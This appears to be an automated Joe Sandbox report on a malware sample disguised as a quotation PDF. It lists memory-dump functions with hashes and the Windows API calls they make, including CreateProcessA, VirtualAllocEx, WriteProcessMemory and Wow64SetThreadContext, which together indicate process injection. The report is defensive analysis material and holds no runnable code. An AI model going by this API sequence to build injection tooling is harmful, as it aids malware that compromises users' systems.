Opcode Fuzzy Hash: 497f625e7ae0b31523fcca2e6cfed20f545b342668c42732571b47868fe9ada1
Instruction Fuzzy Hash: F0E1ABB6B013248BEB19DB75C890BAF7BF6AF89748F104469E546DF290DB35E801CB50

Function 03051469 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c963eefef37a344e70a28c6d79a5ce2941757656609af8daeb7c238488f33ad
Instruction ID: 4677d2b0a93e8399b6a3135e65f3f1f6e228933174e01158aec81ec70d73d22e
Opcode Fuzzy Hash: 2c963eefef37a344e70a28c6d79a5ce2941757656609af8daeb7c238488f33ad
Instruction Fuzzy Hash: CDC1B074E012189FDB54DFA9D884A9EBBF2FF89300F1481A9D809AB355DB349A81CF51

Function 03051478 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 333fb3b2d5324766800fea1534d41fcb76e27f068acb4594dca87bd383878bf2
Instruction ID: 3d02f384d6ec97b080986b0db0d10bd03070024682fa2a87f53e9965398cebf9
Opcode Fuzzy Hash: 333fb3b2d5324766800fea1534d41fcb76e27f068acb4594dca87bd383878bf2
Instruction Fuzzy Hash: D0C1A074E01219DFDB58DFA9D844A9EBBF2FF89300F1081A9D809AB355DB349A81CF51

Function 0305C324 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9170e20ce2b4558e336db7fbc22f29ed55a5d52b6faa3ae15cca924897b962b0
Instruction ID: 0feed691e5f8b9c817ce601f355d900375f58f7b671f2c1fddcf8f5606f05ac9
Opcode Fuzzy Hash: 9170e20ce2b4558e336db7fbc22f29ed55a5d52b6faa3ae15cca924897b962b0
Instruction Fuzzy Hash: 80A18535E01319DFCB04EFA4D854ADEF7BAFF99304F158616E419AB2A4DB30A942CB50

Function 0305C318 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 407619f43e3195391831884cf19a4a45dc23b115498b258bd755f1dbcbfee9cf
Instruction ID: 3a2f769bb416a90aa13733867d6f69fa6ffb833334c1e67cf30c7014214b0765
Opcode Fuzzy Hash: 407619f43e3195391831884cf19a4a45dc23b115498b258bd755f1dbcbfee9cf
Instruction Fuzzy Hash: 38918435E01319DFCB04EFA0D8949DEFBBAFF99304B158615F419AB2A4DB30A942CB50

Function 0305D351 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b282eb67ce4e724183739134155c805066c95c444f16a69d9280d6f04dc01b9c
Instruction ID: 0da6ff960a73a6b52ceb7eae635acca9b4042a39cb24289fc908c87c1c0fff34
Opcode Fuzzy Hash: b282eb67ce4e724183739134155c805066c95c444f16a69d9280d6f04dc01b9c
Instruction Fuzzy Hash: B7917235E01319DFCB04DFA0D894ADEF7BAFF99304B158215F819AB2A4DB30A946CB51

Function 018C8568 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96bf3a12b34fa391cba214ff289560f3fd087cd2fcc9f709f66c34d41f94116d
Instruction ID: e5fe3addb6c01ec28508a7776bdd11c8db5c595610b59dadf8d2966be343984c
Opcode Fuzzy Hash: 96bf3a12b34fa391cba214ff289560f3fd087cd2fcc9f709f66c34d41f94116d
Instruction Fuzzy Hash: 9E7155B4E4120DDFCB14CFA9D494AAEBBB2FF89304F10846AD41AAB354DB349A01CF55

Function 018C1CE8 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18f796976153b6cd776899a5c61de06237941a9e2359d9f1f3adea322e58f24d
Instruction ID: 38cc57f4ff78c015cde317e5ee3c80731e9c1c1178feafa4191ba56ad8291555
Opcode Fuzzy Hash: 18f796976153b6cd776899a5c61de06237941a9e2359d9f1f3adea322e58f24d
Instruction Fuzzy Hash: BB615C70D05209CFCB04DFAAC4846AEFBF2FB89700F24D46AD516EB256D7349A418F94

Function 0A1B38C0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b7617ab15d873801a8b83d069d03daf240ff7121af59537c2f5fb2dea529a40
Instruction ID: 5583d52848cf207e83e0bc0f1f8321b1b213b3bffcfcd5d2688ef85b4a74bacf
Opcode Fuzzy Hash: 7b7617ab15d873801a8b83d069d03daf240ff7121af59537c2f5fb2dea529a40
Instruction Fuzzy Hash: A451CFB4D142189FDB18CFAAD984ADEBBF2BF88300F14D06AD418BB264DB749945CF54

Function 018C9547 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d7e697924c7418c973f3f6ef6cde66b9b2ee4e47cc964e42dbeb8b11d861358
Instruction ID: a44a9ee21da092a6f264a28304ea58af76438610a7d47fbc5008264dcbb44ec8
Opcode Fuzzy Hash: 8d7e697924c7418c973f3f6ef6cde66b9b2ee4e47cc964e42dbeb8b11d861358
Instruction Fuzzy Hash: F7512275E11719CBCB18DFA9C8405DDFBB2FF89714F20862AD409AB214EB30AA46CF40

Function 018C9558 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c24d1162ae2b31fa3d813ab92cd29e910ab50a3c7525b134124d1dec0ff85e3c
Instruction ID: 9766b8c58747c00548cf39e8c04bb473f5fc6c9510e1dc3e4c483d9e67373207
Opcode Fuzzy Hash: c24d1162ae2b31fa3d813ab92cd29e910ab50a3c7525b134124d1dec0ff85e3c
Instruction Fuzzy Hash: 43511475E1165DCBDB14DFE9C8405EDFBB6BF88704F20862AD409AB254EB30AA46CF40

Function 018C2710 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71433101f22144281503ef713d44ea3f4e323a459c4283cf4e458477e8d80f66
Instruction ID: 435691db502718fee3b457e97f4ec02ab56bf172e7582909f0e12fa05cf4cf63
Opcode Fuzzy Hash: 71433101f22144281503ef713d44ea3f4e323a459c4283cf4e458477e8d80f66
Instruction Fuzzy Hash: 2C21FD71E056588BDB18CFABD8442DEFBF3AFC9310F14C06AD508AA268DB355A45CF90

Function 0A1B38D9 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2736d13daa47d94de89d64f12378885fff499e507e88bbc45995f223acd186c0
Instruction ID: c922785507c66f4cf1bcc6587fcba43c99cf2ba9f8c366b1573db2925aa5d765
Opcode Fuzzy Hash: 2736d13daa47d94de89d64f12378885fff499e507e88bbc45995f223acd186c0
Instruction Fuzzy Hash: 9821BB71D146589BEB28CFABC9406DEFBF7AFC9300F14C06AC458AB255EB7049458F50

Function 0A1BDF34 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 326
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A1BE207

Strings

6B, xrefs: 0A1BE15A
6B, xrefs: 0A1BE346
6B, xrefs: 0A1BE281

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: CreateProcess
String ID: 6B$6B$6B
API String ID: 963392458-3453692454
Opcode ID: bddfcfded9c449d08df5b406d0379bead31b9103d0c69528d6978044af7d8ad6
Instruction ID: 655e5b1af541a6260b0b01806c4c8cb3bdbdd384dbe0ad5919c5447dbb276b65
Opcode Fuzzy Hash: bddfcfded9c449d08df5b406d0379bead31b9103d0c69528d6978044af7d8ad6
Instruction Fuzzy Hash: EFC13874D102198FDB20CFA8C845BEDBBB1BF49300F0495AAD859B7290DB749A85CF95

Function 0A1BDF40 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 321
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A1BE207

Strings

6B, xrefs: 0A1BE15A
6B, xrefs: 0A1BE346
6B, xrefs: 0A1BE281

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: CreateProcess
String ID: 6B$6B$6B
API String ID: 963392458-3453692454
Opcode ID: a46b3bacc289e0a5c1003a90f9d4e2156a5c0bf20e050c80cf66af00e5522df2
Instruction ID: 5e0a0e6cadf71e0721823b55cc67ce1dd2a140c6121a3ea2775e3c7499d2568a
Opcode Fuzzy Hash: a46b3bacc289e0a5c1003a90f9d4e2156a5c0bf20e050c80cf66af00e5522df2
Instruction Fuzzy Hash: 03C12770D1022D8FDB24CFA8C845BEDBBB1BF49300F0495AAD859B7290DB749A85CF95

Function 03058628 Relevance: 6.1, APIs: 4, Instructions: 139
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 030586B6
GetCurrentThread.KERNEL32 ref: 030586F3
GetCurrentProcess.KERNEL32 ref: 03058730
GetCurrentThreadId.KERNEL32 ref: 03058789

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9907a174502e97a605fdf06b264e056bc52786c3ecc05b389a3c04f9a3d2e652
Instruction ID: 9cdff485805e1a8d8871203b70682f7cb98d12a074e0b0e18b4c51b1b4bb5ee9
Opcode Fuzzy Hash: 9907a174502e97a605fdf06b264e056bc52786c3ecc05b389a3c04f9a3d2e652
Instruction Fuzzy Hash: CA5178B0A113498FDB14DFAAD948B9EBFF1EF48314F24C459E419A72A0C734A984CF65

Function 03058638 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 030586B6
GetCurrentThread.KERNEL32 ref: 030586F3
GetCurrentProcess.KERNEL32 ref: 03058730
GetCurrentThreadId.KERNEL32 ref: 03058789

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 8e2dc4917fe959009b97681740d953b5ddde5965d722ad662a6abc5d0ca14b9a
Instruction ID: 0872b9638e93c842435ee8bf67b12138c6a7c271246c72a8caa6324df4aec0fe
Opcode Fuzzy Hash: 8e2dc4917fe959009b97681740d953b5ddde5965d722ad662a6abc5d0ca14b9a
Instruction Fuzzy Hash: 215175B0A113098FDB08DFAAD548BAEBBF1EF48310F20C459E419A7360D7349984CF65

Function 03056250 Relevance: 1.7, APIs: 1, Instructions: 228
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(?), ref: 030564D2

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6bea4d4f02ff759c0808eb244722765158e4ca2bd156262853965109a4267afd
Instruction ID: ed41e8853c9562763efbb3a95e8db086f5f6042cff9d6e383745ec42bee9964d
Opcode Fuzzy Hash: 6bea4d4f02ff759c0808eb244722765158e4ca2bd156262853965109a4267afd
Instruction Fuzzy Hash: 5D912470A01B098FDB64DF69D44479ABBF1BF88300F149929E84AE7650DB35E845CF94

Function 0305CF24 Relevance: 1.7, APIs: 1, Instructions: 192COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0305D0F1

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: bfb94f9ffa9ad61a0db00583b318a078a1e39e814344b791001966c44265fd93
Instruction ID: 0c5680243e1019529cc106bf926d46c9aa372ff88f1130a690d708845e7016f0
Opcode Fuzzy Hash: bfb94f9ffa9ad61a0db00583b318a078a1e39e814344b791001966c44265fd93
Instruction Fuzzy Hash: 4F718EB4D01218DFDF20CFA9D984ADEBBF1BB09304F1491AAE858A7211D7309A85CF55

Function 0305CF30 Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0305D0F1

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 817f5cd272a7fbdc0c55ab5a9c6bd7193382740f4e5e562f70dc08d2029739ee
Instruction ID: d73037799a3f548f14ec7990c0f6df41bca67fe9b35b6e3ac92286166cda3b39
Opcode Fuzzy Hash: 817f5cd272a7fbdc0c55ab5a9c6bd7193382740f4e5e562f70dc08d2029739ee
Instruction Fuzzy Hash: 4A717BB4D01218DFDF60CFA9D984ADEBBF1BB09304F1491AAE818B7211D770AA85CF55

Function 03050006 Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 03050131

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 87c25b644dabafef1489cd0acce713fce1f733306b2126083dc9e095e1c17b21
Instruction ID: 1f8629244b0ced24d5bc2f8434540449c14ae705c8d76b4678e30e4746486fe5
Opcode Fuzzy Hash: 87c25b644dabafef1489cd0acce713fce1f733306b2126083dc9e095e1c17b21
Instruction Fuzzy Hash: 475129B1D043588FDB11CFA8C841B9EBBF5BF4A300F14809AD549EB252DB746A89CF95

Function 0A0857B8 Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 0A0858BB

Memory Dump Source

Source File: 00000000.00000002.1723179639.000000000A080000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a080000_Quotation2025-0107pdf.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 659c181e7f3363cfdc23720cda408d96447b2f58f6af48457435893cf163e86a
Instruction ID: 596d5cf132c9ddb6f4f80c8ee28f64650fff3c6e5fd7c941a4a70e53ee82b32f
Opcode Fuzzy Hash: 659c181e7f3363cfdc23720cda408d96447b2f58f6af48457435893cf163e86a
Instruction Fuzzy Hash: 2C5143B8D01258DFDB10CFA9D984ADEFBF1BB09310F24902AE818BB221D375A945CF54

Function 0A0857C0 Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 0A0858BB

Memory Dump Source

Source File: 00000000.00000002.1723179639.000000000A080000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a080000_Quotation2025-0107pdf.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 777af2857f83fcce32cd45737ad6023d8bc55291925b69f0016d48d152909c9d
Instruction ID: b6535bd159840aad14630f92b257e7398f8111aeddb144261409079e6e7e84f7
Opcode Fuzzy Hash: 777af2857f83fcce32cd45737ad6023d8bc55291925b69f0016d48d152909c9d
Instruction Fuzzy Hash: 995145B8D01258DFDB10CFAAD984A9EFBF1BB09310F24902AE818BB211D375A945CF54

Function 03050040 Relevance: 1.6, APIs: 1, Instructions: 123COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 03050131

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 55808175d6e2bd1151cdbf5f1ffb6ceef9230373361c6827c9035a3e8d560465
Instruction ID: a57971169af4b2a149ebd1a47fb649241786463c91d0af485487b2f8bbff9654
Opcode Fuzzy Hash: 55808175d6e2bd1151cdbf5f1ffb6ceef9230373361c6827c9035a3e8d560465
Instruction Fuzzy Hash: 5C51D4B1D002198FDB20DFA9C845BDEBBF5BF49300F1080AAD509BB251DB716A89CF95

Function 0A1BDBB8 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A1BDC8B

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e39625b067aa795b2b830d64223f22a46e66b86399e7a9e723917c77e5171156
Instruction ID: 6d7044f6cb3d9b8913aec0cf3a618e9c94cbf62efac8ac4149e1541773669ecf
Opcode Fuzzy Hash: e39625b067aa795b2b830d64223f22a46e66b86399e7a9e723917c77e5171156
Instruction Fuzzy Hash: 724199B4D012589FCF04CFA9D984AEEFBF1BB49310F20902AE818B7250D775AA45CF64

Function 0305887A Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0305894B

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 97e1e0c2f86bdf3ceda5d196858703e099fc13f6e81e2b25811118978b9b388f
Instruction ID: 691d3a705e34910cd555528a4cd18849213e16e0e6598e10df046b4e2c36a9ac
Opcode Fuzzy Hash: 97e1e0c2f86bdf3ceda5d196858703e099fc13f6e81e2b25811118978b9b388f
Instruction Fuzzy Hash: 644176B9D002589FCB00CFA9D984AEEBBF5BF49310F24946AE958BB310D335A945CF54

Function 0A1BDD0A Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A1BDDC2

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2e69878fcad7e18ee8db1c8f2f25b6633064aaa0c2efd574f7c957b31ada5d56
Instruction ID: ee10f73d9b1ff4b279dbe7228e0208c8c1232f7e31eec554c673cf88a8fff102
Opcode Fuzzy Hash: 2e69878fcad7e18ee8db1c8f2f25b6633064aaa0c2efd574f7c957b31ada5d56
Instruction Fuzzy Hash: 7741A8B4D042589FCF14CFAAE884AEEFBB1BB49310F14942AE855B7250C735A946CF64

Function 03058880 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0305894B

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7b64c9875d7f7e3f522d1f30e39739502c434f773caf10a265115e672883233f
Instruction ID: 545e9df93f834fd43bd1464c4bc05741ffbc688b0762af6210e636ae3a22daba
Opcode Fuzzy Hash: 7b64c9875d7f7e3f522d1f30e39739502c434f773caf10a265115e672883233f
Instruction Fuzzy Hash: 6E4164B9D002589FCB00CFAAD984ADEBBF5BB09310F14902AE918BB310D335A945CF54

Function 0A1BDD10 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A1BDDC2

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 46717b59c14cdab5c0d2065bc2dc2857d5f63c0794cf05eb9ba3158964a182b7
Instruction ID: c64981f46597b3d3432411a61fa399b3a22e2290acbb15adabf722a255cdcd97
Opcode Fuzzy Hash: 46717b59c14cdab5c0d2065bc2dc2857d5f63c0794cf05eb9ba3158964a182b7
Instruction Fuzzy Hash: E841A9B4D00258DFCF14CFAAD884AEEFBB1BB49310F10942AE815B7240C735A945CF68

Function 018C8444 Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 018C850F

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c40396957f01655931ea1e6607ea8613a27a77ba385fd6fbd30eea550dc7f600
Instruction ID: c017ab9d81640afc2c823e81935cf3cab1c5ee8d1eed630916ceaea4e8445862
Opcode Fuzzy Hash: c40396957f01655931ea1e6607ea8613a27a77ba385fd6fbd30eea550dc7f600
Instruction Fuzzy Hash: A241B9B9D002589FCB10CFA9D484AEEFFF0AF1A310F14906AE854B7250D374AA45CF64

Function 0A1BDA90 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A1BDB42

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f9cb3c82dd8bdfc97de8e7a068d16c4139f4d746e49dd95159c4c95d4cf12b73
Instruction ID: e0c60a24e29bf42d4d9a7612ff900ef8a33b6245fd7970a1498ba0b86fb6d66b
Opcode Fuzzy Hash: f9cb3c82dd8bdfc97de8e7a068d16c4139f4d746e49dd95159c4c95d4cf12b73
Instruction Fuzzy Hash: BE3198B8D00258DFCF14CFA9E984ADEFBB1BB49310F10942AE815B7210D735A946CF68

Function 0A1BDA98 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A1BDB42

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1bf35d330ee092d46d2527adf2136318f83cbb40e466ce2c6261bb0124c8acbe
Instruction ID: c9d8daa24c04cfad0801245a44927e382f16e890869481e43c6316efbabb818c
Opcode Fuzzy Hash: 1bf35d330ee092d46d2527adf2136318f83cbb40e466ce2c6261bb0124c8acbe
Instruction Fuzzy Hash: F03187B8D00258DFCF14CFA9E984ADEFBB1BB49310F10942AE815B7250D735A946CF68

Function 0A1BD968 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0A1BDA1F

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 0009098bfc6d88d69b6b59bba52558d897ec9fa29376a4b826cb2d4486fe6f1f
Instruction ID: fd4996b8513a691709aefbbfa9ff4cc3015b0ba832e87dd601e183252787a7e4
Opcode Fuzzy Hash: 0009098bfc6d88d69b6b59bba52558d897ec9fa29376a4b826cb2d4486fe6f1f
Instruction Fuzzy Hash: 7F41CBB4D152589FCB14CFAAD884AEEFFF1AF49314F24802AE419B7240C778A946CF54

Function 0305C424 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0305F761

Memory Dump Source

Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

